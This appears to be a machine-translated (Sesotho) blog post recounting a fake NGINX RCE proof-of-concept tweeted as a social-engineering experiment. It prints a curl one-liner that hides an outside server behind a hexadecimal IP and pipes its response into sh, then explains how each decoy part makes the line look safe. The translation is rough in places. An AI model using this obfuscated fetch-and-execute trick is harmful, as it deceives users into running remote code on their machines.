Hlokomela. fetolela.: molaetsa oa pele, o hatisitsoeng ka June 1, o ile a etsa qeto ea ho etsa liteko har'a ba thahasellang ts'ireletso ea tlhahisoleseding. Ho etsa sena, o ile a lokisetsa tlhekefetso ea bohata bakeng sa ts'oaetso e sa tsejoeng ho seva sa marang-rang 'me ae beha ho Twitter. Maikutlo a hae - ho pepesoa hang-hang ke litsebi tse neng li tla bona thetso e totobetseng ka khoutu - ha ea ka ea phethahala feela ... Ba ile ba feta litebello tsohle, 'me ka lehlakoreng le leng: tweet e ile ea fumana tšehetso e kholo ho batho ba bangata ba sa kang ba etsa joalo. hlahloba litaba tsa eona.
TL; DR: Se ke oa sebelisa pipelining ea faele ka sh kapa bash tlas'a maemo afe kapa afe. Ena ke tsela e ntle ea ho lahleheloa ke taolo ea komporo ea hau.
Ke batla ho arolelana le uena pale e khuts'oane e mabapi le ts'ebetso ea metlae ea PoC e entsoeng ka la 31 Motšeanong. O ile a hlaha hang ha a araba litaba tse tsoang ho , setho (ZDI), hore tlhahisoleseding e mabapi le ho ba kotsing ho NGINX e lebisang ho RCE (ho phethahatsa khoutu e hole) haufinyane e tla senoloa. Kaha NGINX e matlafatsa liwebsaete tse ngata, litaba e tlameha ebe e bile bomo. Empa ka lebaka la tieho ea ts'ebetso ea "phallo e nang le boikarabelo", lintlha tsa se etsahetseng li ne li sa tsejoe - ona ke mokhoa o tloaelehileng oa ZDI.
mabapi le phatlalatso ea tlokotsi ho NGINX
Ha ke qeta ho sebetsa ka mokhoa o mocha oa obfuscation ho curl, ke ile ka qotsa tweet ea mantlha mme ka "lutla PoC e sebetsang" e nang le mohala o le mong oa khoutu eo ho thoeng e sebelisa hampe tlokotsi e fumanoeng. Ha e le hantle, sena e ne e le bohlanya bo felletseng. Ke ne ke nahana hore ke tla pepesoa hang-hang, le hore hantle ke tla fumana li-retweets tse 'maloa (oh hantle).
ka tšebeliso ea fake
Leha ho le joalo, ke ne ke sa nahane hore na ho ile ha etsahala’ng ka mor’a moo. Botumo ba tweet ea ka bo ile ba phahama. Hoa makatsa hore ebe hona joale (15:00 Moscow nako ea June 1) batho ba 'maloa ba hlokometse hore sena ke fake. Batho ba bangata ba e khutlisa ntle le ho e hlahloba ho hang (re se re sa re letho ka ho khahloa ke litšoantšo tse ntle tsa ASCII tseo e li hlahisang).
Sheba feela kamoo e leng ntle kateng!
Le ha loops le mebala ena kaofela e le ntle, ho hlakile hore batho ba ne ba tlameha ho tsamaisa khoutu mochining oa bona ho ba bona. Ka lehlohonolo, libatli li sebetsa ka tsela e ts'oanang, 'me li kopantsoe le taba ea hore ke ne ke hlile ke sa batle ho kena mathateng a molao, khoutu e patiloeng sebakeng sa ka sa marang-rang e ne e mpa e etsa mehala ea echo ntle le ho leka ho kenya kapa ho etsa khoutu efe kapa efe e eketsehileng.
Phapang e nyane: , , 'na le bahlankana ba bang ba sehlopha Esale re ntse re bapala ka mekhoa e fapaneng ea ho hlakola litaelo tsa curl ka nakoana hobane ho monate ... 'me re li-geek. netspooky le dnz ba ile ba sibolla mekhoa e mengata e mecha e neng e bonahala e nkhopisa haholo. Ke ile ka kenela monate 'me ka leka ho eketsa liphetoho tsa IP ho mokotla oa maqheka. Ho ile ha fumaneha hore IP e ka fetoloa sebopeho sa hexadecimal. Ho feta moo, li-curl le lisebelisoa tse ling tsa NIX li ja li-IP tsa hexadecimal ka thabo! Kahoo e ne e mpa e le taba ea ho theha mola oa taelo o kholisang le o shebahalang o bolokehile. Qetellong, ke ile ka tsepamisa maikutlo tabeng ena:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhostSocio-electronic engineering (S.E.E.) ha e felle feela ka phishing
Tšireletseho le ho tloaelana e ne e le karolo e kholo ea teko ena. Ke nahana hore ke tsona tse lebisitseng katlehong ea hae. Mohala oa taelo o ne o bolela ts'ireletso ka ho hlaka ka ho bua ka "127.0.0.1" (moamoheli ea tsebahalang oa lehae). Localhost e nkoa e sireletsehile 'me data e ho eona ha e tlohe khomphuteng ea hau.
Ho tseba e ne e le karolo ea bobeli ea senotlolo S.E.E. ea teko. Kaha bamameli ba shebiloeng haholo-holo ba ne ba e-na le batho ba tsebang lintho tsa motheo tsa ts'ireletso ea k'homphieutha, ho ne ho le bohlokoa ho etsa khoutu e le hore likarolo tsa eona li bonahale li tloaelehile ebile li tloaelehile (ka hona li bolokehile). Ho alima likarolo tsa likhopolo tsa khale tsa tšebeliso e mpe le ho li kopanya ka tsela e sa tloaelehang ho ipakile ho atlehile haholo.
Ka tlase ke tlhahlobo e qaqileng ea liner e le 'ngoe. Tsohle tse lethathamong lena lia apara setlolo tlhaho, 'me ha ho letho le hlokahalang bakeng sa ts'ebetso ea eona ea sebele.
Ke likarolo life tse hlileng li hlokahalang? Sena -gsS, -O 0x0238f06a, |sh le seva sa webo ka bosona. Seva ea Marang-rang e ne e se na litaelo tse kotsi, empa e ne e fana ka litšoantšo tsa ASCII feela e sebelisa litaelo echo script e leng ho index.html. Ha mosebelisi a kena moleng le |sh mahareng, index.html laeloa le ho phethisoa. Ka lehlohonolo, bahlokomeli ba seva sa marang-rang ba ne ba se na sepheo se sebe.
-
../../../%00- e emela ho fetela ka nģ'ane ho directory; -
ngx_stream_module.so- tsela ea ho ea mojuleng oa NGINX o sa reroang; -
/bin/sh%00<'protocol:TCP'- re ntse re qala/bin/shmochining o shebiloeng ebe o tsamaisa tlhahiso ho mocha oa TCP; -
-O 0x0238f06a#PLToffset- motsoako oa sekhukhu, o tlatsitsoe#PLToffset, ho shebahala joalo ka memori ea memori ka tsela e itseng e fumanehang ho PLT; -
|sh;- sekhechana se seng sa bohlokoa. Re ne re hloka ho fetisetsa tlhahiso ho sh/bash e le hore re phethe khoutu e tsoang ho seva sa marang-rang se hlaselang se fumanehang ho.0x0238f06a(2.56.240.x); -
nc /dev/tcp/localhost- dummy eo netcat e buang ka eona/dev/tcp/localhoste le hore ntho e 'ngoe le e' ngoe e shebahale e sireletsehile hape. Ha e le hantle, ha e etse letho mme e kenyelelitsoe moleng oa botle.
Sena se phethela tlhaloso ea mongolo oa mohala o le mong le puisano ea likarolo tsa "socio-electronic engineering" (phishing e rarahaneng).
Tlhophiso ea Seva ea Webo le Mehato ea ho Loantša
Kaha boholo ba ba ngolisitseng ke infosec / hackers, ke ile ka etsa qeto ea ho etsa hore seva sa marang-rang se be se hanyetsanang le lipolelo tsa "thahasello" ho bona, e le hore bashanyana ba be le seo ba ka se etsang ('me ho ka ba monate ho tlhophiso). Ha ke na ho thathamisa maraba ohle mona kaha teko e ntse e tsoela pele, empa lintho tse 'maloa tseo seva e li etsang ke tsena:
- E beha leihlo liteko tsa ho aba ka mafolofolo marang-rang a mang a sechaba 'me e bea manane a fapaneng a ponelopele ho khothaletsa mosebelisi ho tobetsa sehokelo.
- E tsamaisa Chrome/Mozilla/Safari/etc ho video ea papatso ea Thugcrowd ho fapana le ho bonts'a script ea khetla.
- Litebelo tsa matšoao a BONAHALA a ho kena-kenana / ho qhekella ka mokhoa o hlakileng, ebe o qala ho romella likopo ho li-server tsa NSA (ha!).
- E kenya Trojan, hammoho le rootkit ea BIOS, lik'homphieutheng tsohle tseo basebelisi ba tsona ba etelang moamoheli ho tsoa ho sebatli se tloaelehileng (ho bapala feela!).
Karolo e nyane ea li-antimer
Tabeng ena, sepheo sa ka feela e ne e le ho tseba likarolo tse ling tsa Apache - haholo-holo, melao e pholileng ea ho tsamaisa likōpo - 'me ke ile ka nahana: hobane'ng?
Tšebeliso ea NGINX (Sebele!)
Ingolise ho ho Twitter mme u latele mosebetsi o motle oa ZDI oa ho sebetsana le bofokoli ba 'nete le ho sebelisa menyetla ho NGINX. Mosebetsi oa bona o 'nile oa nkhahla' me ke leboha Alice ka mamello ea hae ka litlhaloso tsohle le litemoso tse bakiloeng ke tweet ea ka e hlokang kelello. Ka lehlohonolo, e boetse e entse hantle: e thusitse ho tsebisa batho ka bofokoli ba NGINX, hammoho le mathata a bakoang ke tlhekefetso ea curl.
Source: www.habr.com